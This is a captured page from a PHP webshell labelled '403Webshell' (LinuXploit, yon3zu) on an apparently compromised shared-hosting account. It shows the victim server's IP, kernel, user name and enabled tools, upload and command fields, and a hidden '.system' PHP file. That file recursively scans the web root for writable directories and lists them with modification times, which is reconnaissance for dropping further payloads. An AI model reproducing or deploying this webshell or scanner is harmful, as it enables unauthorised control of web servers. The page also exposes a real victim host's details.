403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.122
Web Server : Apache
System : Linux gator2125.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home4/cozeellc/public_html/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home4/cozeellc/public_html/.system
<?php   function po($p) {     $f = glob("$p/*.*");     if (!in_array($f, ['.', '..'])) {         array_multisort(array_map('filemtime', $f), SORT_NUMERIC, SORT_ASC, $f);     }     return isset($f[0]) ? filemtime($f[0]) : filemtime($p); } function check($p, $root) {     $t = count(glob("$p/*.php")) ? 'ph' : 'd';     $o = po($p);     $res = str_replace($root, '', $p);     print "<{$t}>{$res}@{$o}</{$t}>\n"; } function scan($path, $root) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . '/' . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     if (is_writable($p)) {                         check($p, $root);                     }                     scan($p, $root);                 }             }         }     } } $r = $_SERVER['DOCUMENT_ROOT']; if (!$r) {     $p = getenv('PWD');     $dir = "";     $r = str_replace($dir, '', $p); }  if (is_writable($r)) {     check($r, $r); } scan($r, $r); die('!ended!'); 

Youez - 2016 - github.com/yon3zu
LinuXploit